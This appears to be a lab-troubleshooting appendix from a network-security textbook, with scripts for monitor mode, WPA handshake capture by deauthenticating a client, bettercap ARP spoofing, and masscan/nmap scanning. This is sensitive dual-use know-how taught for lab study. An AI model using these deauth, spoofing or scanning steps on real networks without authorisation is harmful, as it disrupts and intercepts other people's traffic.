Appendices Chapter 7

Appendix G: Lab Troubleshooting

Overview

This appendix provides solutions to common problems encountered while working through the hands-on labs.


Network Interface Issues

Interface Not Showing Up

# Check whether the kernel has registered the interface at all
ip link show

# If it is missing, look for the driver's messages (many distros restrict dmesg to root)
sudo dmesg | grep -iE 'eth|wlan'

# Load the driver by hand (the module name depends on the chipset, not the vendor)
sudo modprobe <driver_name>

# For USB adapters, first confirm the device enumerated; if lsusb does not list it,
# no driver will help (try another port or cable)
lsusb

Monitor Mode Won’t Enable

# Check that the driver advertises monitor mode ("* monitor" must appear in the list)
iw list | grep -A 10 "Supported interface modes"

# Stop the processes that will keep resetting the interface (NetworkManager,
# wpa_supplicant). Note this takes the host off Wi-Fi until you start them again.
sudo airmon-ng check kill

# Manual monitor mode
sudo ip link set wlan0 down
sudo iw dev wlan0 set monitor control
sudo ip link set wlan0 up

# Alternative: iwconfig (deprecated, but still on most lab images)
sudo iwconfig wlan0 mode monitor
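The manual steps above as one script, added here as an example and not taken from the book or the aircrack-ng project: it checks that some phy advertises monitor mode before touching the interface, reads the mode back after the change instead of trusting exit codes, and restores managed mode and the services that airmon-ng stopped. The interface name wlan0 and the service names in disable_monitor are assumptions about a typical Kali-style lab host.

```bash
#!/bin/bash
# Added example: monitor mode with a support check before and a verification after.
# Assumptions: interface wlan0; NetworkManager and wpa_supplicant are the services
# that `airmon-ng check kill` stopped.
set -eu

# Read `iw list` output on stdin and succeed only if "* monitor" appears inside a
# "Supported interface modes" block. Kept as a filter so it can also be run
# against output saved from another machine.
monitor_supported_in() {
  awk '
    /Supported interface modes/ { in_modes = 1; next }
    in_modes && /^[[:space:]]*\*/ { if ($0 ~ /\* monitor/) found = 1; next }
    in_modes { in_modes = 0 }            # first non-bullet line ends the block
    END { exit found ? 0 : 1 }'
}

enable_monitor() {
  iface=${1:-wlan0}
  iw list | monitor_supported_in || {
    echo "no phy on this host advertises monitor mode" >&2; return 1; }
  sudo airmon-ng check kill              # stops NetworkManager, wpa_supplicant, ...
  sudo ip link set "$iface" down
  sudo iw dev "$iface" set monitor control
  sudo ip link set "$iface" up
  # Read the type back; a driver can accept the command and still stay managed.
  iw dev "$iface" info | grep -q 'type monitor' || {
    echo "$iface is not in monitor mode" >&2; return 1; }
  echo "$iface: monitor mode active"
}

# Put the adapter back into managed mode and bring the services back.
disable_monitor() {
  iface=${1:-wlan0}
  sudo ip link set "$iface" down
  sudo iw dev "$iface" set type managed
  sudo ip link set "$iface" up
  sudo systemctl start wpa_supplicant NetworkManager 2>/dev/null || true
}

# Usage: ./monitor.sh enable [iface]   |   ./monitor.sh disable [iface]
case "${1:-}" in
  enable)  enable_monitor "${2:-wlan0}" ;;
  disable) disable_monitor "${2:-wlan0}" ;;
esac
```

Run `./monitor.sh disable` when the lab is over; otherwise the host stays without Wi-Fi and the next lab's "network not working" ticket is this one in disguise.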

Interface Has No IP Address

# Ask for a DHCP lease (on a NetworkManager host use nmcli instead, or the two will fight over the interface)
sudo dhclient eth0

# Or set a static address (values are examples; match your lab subnet)
sudo ip addr add 192.168.1.100/24 dev eth0
sudo ip route add default via 192.168.1.1

# Check the physical link ("Link detected: yes/no" at the bottom of the output)
ethtool eth0

Virtual Machine Issues

Network Not Working in VM

# Check the VM's network adapter settings in the hypervisor
# Ensure the right mode: NAT, Bridged, or Host-only

# For bridged mode, bind to the physical interface that actually carries the uplink

# Restart networking inside the guest, using whichever manager the image runs
sudo systemctl restart NetworkManager

# Or (ifupdown-based images)
sudo systemctl restart networking

VM Can’t Reach Internet

Checklist:
□ VM network adapter connected
□ Correct network mode selected
□ Host firewall not blocking
□ VPN on host not interfering
□ DNS configured correctly

VM Network Too Slow

# Use virtio network drivers (KVM/QEMU) rather than an emulated e1000/rtl8139 NIC
# Check the VM has enough CPU and RAM

# Disable segmentation offload if transfers stall or captures show frames far larger than the MTU
sudo ethtool -K eth0 tso off gso off

Wireshark Issues

No Interfaces Shown

# Let non-root users capture. dumpcap does the actual capturing, so it is the
# binary that gets the capabilities, not Wireshark itself. Keep it group-only:
# a world-executable dumpcap with these capabilities lets every local account sniff.
sudo chgrp wireshark /usr/bin/dumpcap
sudo chmod 750 /usr/bin/dumpcap
sudo setcap cap_net_raw,cap_net_admin=eip /usr/bin/dumpcap

# Add your user to the wireshark group
sudo usermod -aG wireshark $USER
# Log out and back in for the new group to apply

Can’t Capture Traffic

# Running Wireshark itself as root is a last resort: its dissectors parse
# hostile input. Prefer capturing with tcpdump/dumpcap under sudo and opening
# the file as an unprivileged user.
sudo wireshark

# /dev/net/tun only matters when capturing on tun/tap (VPN) interfaces
ls -la /dev/net/tun

# Verify the interface is up
ip link show eth0

Capture File Too Large

Solutions:
- Use a capture filter (BPF) so unwanted traffic is never written to disk
- Set a ring buffer so the capture rotates across a fixed number of files
- Capture for a set duration only
- Compress finished .pcap/.pcapng files with gzip (Wireshark opens them directly)
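The four measures combined, as an added example (not from the book): a dumpcap ring-buffer capture with a capture filter and a time limit, plus a helper that gzips the finished ring files while leaving the newest ones for dumpcap to write. Interface, filter, file sizes and the output directory are lab assumptions.

```bash
#!/bin/bash
# Added example (not from the book): bounded capture plus compression of finished files.
# Assumptions: interface eth0, lab driven over SSH on port 22, output under /var/tmp.
set -eu

# Ring-buffer capture: at most 20 files of ~100 MB, stop after 10 minutes, and
# never record the SSH session you are driving the lab from.
ring_capture() {
  iface=${1:-eth0}
  outdir=${2:-/var/tmp/lab-captures}
  mkdir -p "$outdir"
  dumpcap -i "$iface" \
    -f 'not tcp port 22' \
    -b filesize:102400 \
    -b files:20 \
    -a duration:600 \
    -w "$outdir/lab.pcapng"
}

# Gzip every .pcapng in a directory except the newest N, which dumpcap may still
# be writing. Prints how many files were compressed.
# Assumes file names without spaces (dumpcap's own naming scheme).
compress_finished_captures() {
  dir=$1
  keep=${2:-1}
  count=0
  for f in $(ls -t "$dir"/*.pcapng 2>/dev/null | tail -n +$((keep + 1))); do
    gzip -9 "$f"
    count=$((count + 1))
  done
  echo "$count"
}
```

Run compress_finished_captures from cron or after the capture ends; keeping two files uncompressed (`keep=2`) is safer than one if dumpcap is still rotating.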

Tool-Specific Issues

Nmap Slow Scans

# Use a faster timing template (-T4 is fine on a LAN; -T5 starts dropping results on lossy links)
nmap -T4 target

# Limit the port range
nmap --top-ports 100 target

# Skip reverse DNS lookups
nmap -n target

# For large ranges, sweep with masscan first and hand nmap only the open ports

Aircrack-ng Not Detecting Handshake

Troubleshooting:
1. Lock airodump-ng to the AP's channel (-c); channel hopping misses the handshake
2. Verify a client is actually associated with the target AP (STATION list, BSSID column)
3. Send a few deauths to one client, then wait; the client has to reconnect for the 4-way handshake to appear, and it cannot while it is still being deauthed
4. Check signal strength (PWR column) for both the AP and the client
5. Ensure the interface is really in monitor mode (iw dev shows "type monitor")
6. Try a different wireless adapter; some drivers cannot inject frames
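Steps 2 and 3 as code, added here as an example that is not from the book or the aircrack-ng suite: a parser for airodump-ng's CSV output that lists the stations associated with a given BSSID, a capture routine that deauths one confirmed client a few times rather than flooding, and a check that the handshake actually landed. The CSV sample is constructed; MAC addresses, ESSID, channel and interface name are made-up lab values.

```bash
#!/bin/bash
# Added example (not from the book): confirm a client before deauthing, then
# confirm the handshake. All addresses and names are constructed lab values.
set -eu

# Constructed airodump-ng CSV (the -w prefix-01.csv file): AP section, blank
# line, then the station section.
SAMPLE_CSV='BSSID, First time seen, Last time seen, channel, Speed, Privacy, Cipher, Authentication, Power, # beacons, # IV, LAN IP, ID-length, ESSID, Key
AA:BB:CC:DD:EE:01, 2024-01-01 10:00:00, 2024-01-01 10:05:00,  6,  54, WPA2, CCMP, PSK, -40,  120,  0,   0.  0.  0.  0,   6, LabNet, 

Station MAC, First time seen, Last time seen, Power, # packets, BSSID, Probed ESSIDs
11:22:33:44:55:66, 2024-01-01 10:00:10, 2024-01-01 10:05:00, -50,  35, AA:BB:CC:DD:EE:01, LabNet
77:88:99:AA:BB:CC, 2024-01-01 10:01:00, 2024-01-01 10:04:00, -70,   3, (not associated), LabNet'

# Print the MACs of stations associated with BSSID $2 from airodump CSV $1.
associated_stations() {
  awk -F', *' -v want="$(printf '%s' "$2" | tr 'a-f' 'A-F')" '
    /^Station MAC/ { in_stations = 1; next }
    in_stations && NF >= 6 && toupper($6) == want { print $1 }' "$1"
}

# Capture on the AP channel and deauth one confirmed client five times.
# Usage: capture_handshake wlan0mon 6 AA:BB:CC:DD:EE:01 11:22:33:44:55:66 hs
capture_handshake() {
  iface=$1 channel=$2 bssid=$3 station=$4 prefix=${5:-hs}
  sudo airodump-ng -c "$channel" --bssid "$bssid" -w "$prefix" "$iface" &
  dump=$!
  sleep 10                                   # let airodump settle on the channel
  sudo aireplay-ng --deauth 5 -a "$bssid" -c "$station" "$iface"
  sleep 20                                   # give the client time to reconnect
  sudo kill "$dump"
}

# aircrack-ng lists "WPA (1 handshake)" for a capture that contains one.
handshake_captured() {
  aircrack-ng "$1" 2>/dev/null | grep -q 'WPA ([1-9][0-9]* handshake'
}
```

If associated_stations prints nothing for your BSSID, deauthing is pointless: there is no client to force a reconnect, and the handshake will never appear.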

Bettercap ARP Spoof Not Working

# Ensure IP forwarding is on. "sudo echo 1 > /proc/..." fails because the
# redirect runs as your user, so use sysctl
sudo sysctl -w net.ipv4.ip_forward=1

# Check you are on the same L2 segment as both targets (ARP spoofing does not cross routers)
ip addr show

# Verify the targets bettercap discovered (net.probe on fills the table faster)
net.show

# Check for defenses: Dynamic ARP Inspection, static ARP entries on the victim,
# or a switch that drops gratuitous ARP will make the attack fail silently

Lab Environment Issues

Docker Containers Not Starting

# Check the Docker daemon
sudo systemctl status docker

# View the container's own logs (the usual place the real error is)
docker logs container_name

# Check disk usage; a full disk is the most common "won't start" cause
docker system df

# Prune unused resources. With -a this also deletes every image not used by a
# running container, so the labs will re-pull
docker system prune -a

VirtualBox Network Issues

Common fixes:
1. Reset network adapters
2. Reinstall VirtualBox network drivers
3. Check host firewall rules
4. Update VirtualBox
5. Use different network mode

Metasploitable Can’t Connect

# Check the VM is running
# Use Host-only (or an internal network). Metasploitable is deliberately
#   vulnerable and must never be placed on a bridged or production network
# Check the IP address on the Metasploitable console (ifconfig; it is an old image)
# Ping from the attack VM; both VMs must be on the same host-only network

Permission Issues

Need Root for Raw Sockets

# Option 1: Run as root
sudo python3 script.py

# Option 2: Give the interpreter CAP_NET_RAW. This lets every script run by that
# interpreter, by any user on the box, open raw sockets, so apply it to a
# dedicated copy of the interpreter rather than the system python3
sudo setcap cap_net_raw+ep /usr/bin/python3.x

# Note: switching Scapy to L3RawSocket (often quoted as a fix) changes which
# socket implementation it uses, which is needed for loopback traffic on Linux.
# It does not remove the need for CAP_NET_RAW.
from scapy.all import conf
conf.L3socket = conf.L3RawSocket

Iptables Changes Not Persisting

# Save the live rules. The redirect must run as root too, hence the sh -c.
# This covers IPv4 only; ip6tables-save handles IPv6 separately.
sudo sh -c 'iptables-save > /etc/iptables.rules'

# Restore on boot. rc.local is absent on most current distros, so use a
# systemd oneshot unit (or a NetworkManager dispatcher script) that runs:
iptables-restore < /etc/iptables.rules

# Or let the distro handle it (Debian/Ubuntu; rules live in /etc/iptables/rules.v4 and rules.v6)
sudo apt install iptables-persistent

# On nftables-based systems (Debian 11+, recent Fedora) iptables is a shim over
# nf_tables; "iptables -V" shows which backend you are on. Do not mix legacy
# and nft tools on the same host or rules will appear to vanish.
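A systemd unit that does the restore at boot, as an added example (not from the book or from iptables-persistent): it saves both rule sets with restrictive permissions and writes a oneshot unit ordered before the network comes up. The file paths under /etc/iptables and the /usr/sbin binary locations are Debian-style assumptions; adjust for your distro.

```bash
#!/bin/bash
# Added example (not from the book): persist iptables rules with a systemd
# oneshot unit. Paths are assumptions for a Debian-style host.
set -eu

RULES_V4=${RULES_V4:-/etc/iptables/rules.v4}
RULES_V6=${RULES_V6:-/etc/iptables/rules.v6}

# Save the live IPv4 and IPv6 rule sets (run as root).
save_rules() {
  mkdir -p "$(dirname "$RULES_V4")"
  iptables-save  > "$RULES_V4"
  ip6tables-save > "$RULES_V6"
  chmod 600 "$RULES_V4" "$RULES_V6"     # rule sets reveal the lab topology
}

# Write a oneshot unit that restores both rule sets before networking starts.
# $1 = directory to write into (default /etc/systemd/system). Prints the unit path.
write_restore_unit() {
  unit_dir=${1:-/etc/systemd/system}
  unit="$unit_dir/iptables-restore.service"
  cat > "$unit" <<EOF
[Unit]
Description=Restore iptables rules
DefaultDependencies=no
Before=network-pre.target
Wants=network-pre.target

[Service]
Type=oneshot
ExecStart=/usr/sbin/iptables-restore $RULES_V4
ExecStart=/usr/sbin/ip6tables-restore $RULES_V6
RemainAfterExit=yes

[Install]
WantedBy=multi-user.target
EOF
  echo "$unit"
}

# Register and start the unit (run as root).
enable_unit() {
  systemctl daemon-reload
  systemctl enable --now iptables-restore.service
}
```

Ordering before network-pre.target matters: restoring after interfaces come up leaves a window where the lab box has no firewall at all.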

Common Error Messages

"Operation not permitted"

Cause: Insufficient privileges (not root, or a container/user lacking the needed capability such as CAP_NET_RAW)
Fix: Run with sudo or set the needed capability on the binary

"No route to host"

Cause: No route to the destination, or a firewall answering with ICMP host-prohibited (a REJECT rule produces exactly this message)
Fix:
- Check IP configuration
- Verify the routing table
- Check firewall rules on both ends

"Connection refused"

Cause: Nothing listening on that port, or a firewall REJECT with tcp-reset
Fix:
- Verify the service is running
- Check listening ports: ss -tlnp
- Check firewall: iptables -L -n

"Address already in use"

Cause: Port already bound, or still in TIME_WAIT from a previous run of your tool
Fix:
- Find the process: ss -tlnp | grep :PORT
- Kill the process: kill <pid>
- Use a different port (or set SO_REUSEADDR in your own code)

Performance Issues

Scans Taking Too Long

Speed improvements:
- Use -T4 timing (-T5 only on a reliable LAN; it drops results on lossy links)
- Reduce the port range
- Leave out version detection (-sV) until you know which ports are open
- Use masscan for initial discovery
- Split the target range and run the scans in parallel
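The two-stage pattern recommended above and under "Nmap Slow Scans", written out as an added example (not from the book, nmap or masscan): masscan sweeps the whole port range, and nmap then does version detection only on the ports masscan actually found. The masscan list output, host addresses and rate are constructed lab values.

```bash
#!/bin/bash
# Added example (not from the book): masscan for discovery, nmap -sV only on
# what masscan found. Sample output and addresses are constructed.
set -eu

# Constructed `masscan -oL` list output ("open <proto> <port> <host> <timestamp>").
SAMPLE_MASSCAN='#masscan
open tcp 443 10.0.0.5 1700000000
open tcp 22 10.0.0.5 1700000001
open tcp 22 10.0.0.9 1700000002
open tcp 8080 10.0.0.9 1700000003
# end'

# Stage 1: fast sweep. Keep --rate modest on a lab switch or the second pass
# will "lose" ports that masscan reported open.
discover() {
  subnet=$1 out=${2:-discovery.lst}
  sudo masscan "$subnet" -p1-65535 --rate 2000 -oL "$out"
}

# Unique open TCP ports from a masscan list file, formatted for nmap -p.
ports_from_masscan() {
  awk '$1 == "open" && $2 == "tcp" { print $3 }' "$1" | sort -n -u | paste -sd, -
}

# Unique hosts that had at least one open port.
hosts_from_masscan() {
  awk '$1 == "open" { print $4 }' "$1" | sort -u
}

# Stage 2: version detection only where it can matter, no DNS, results in all
# three nmap formats under followup.*
followup_nmap() {
  list=$1
  ports=$(ports_from_masscan "$list")
  [ -n "$ports" ] || { echo "no open TCP ports in $list" >&2; return 1; }
  hosts_from_masscan "$list" | nmap -n -T4 -sV -p "$ports" -iL - -oA followup
}
```

Usage on a lab range: `discover 10.0.0.0/24 discovery.lst && followup_nmap discovery.lst`. Scanning the union of ports across all hosts is a deliberate trade-off: it wastes a few probes on hosts that do not have a given port but keeps the nmap invocation to a single run.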

High CPU During Analysis

Solutions:
- Filter traffic during capture
- Use ring buffer
- Process smaller file segments
- Increase VM resources
- Use command-line tools (tshark)

Getting Help

Log Collection

# System logs
journalctl -xe
dmesg | tail -50

# Network status
ip addr; ip route
cat /etc/resolv.conf

# Process list
ps aux | grep <tool>

Online Resources

  • Tool documentation (man pages)
  • GitHub issues for tools
  • Stack Exchange Network Engineering
  • Reddit r/netsec, r/AskNetSec
  • SANS Reading Room

Quick Diagnostic Script

#!/bin/bash
# quick_diag.sh - Lab environment diagnostic
# Run as a normal user; only the firewall section asks for sudo.
set -u

section() { printf '\n=== %s ===\n' "$1"; }

section "Network Interfaces"
ip addr

section "Routes"
ip route

section "DNS"
cat /etc/resolv.conf

section "Listening Ports (TCP and UDP)"
ss -tulnp

section "IP Forwarding"
cat /proc/sys/net/ipv4/ip_forward

section "Firewall Rules"
sudo iptables -L -n -v
# On nftables-based hosts the real rule set lives here
if command -v nft >/dev/null 2>&1; then
    sudo nft list ruleset
fi

section "Wireless Interfaces"
# iw replaces the deprecated iwconfig; it prints nothing when there is no Wi-Fi
wifi=$(iw dev 2>/dev/null || true)
[ -n "$wifi" ] && printf '%s\n' "$wifi" || echo "No wireless interfaces"

section "Docker Status"
docker ps 2>/dev/null || echo "Docker not running (or user not in the docker group)"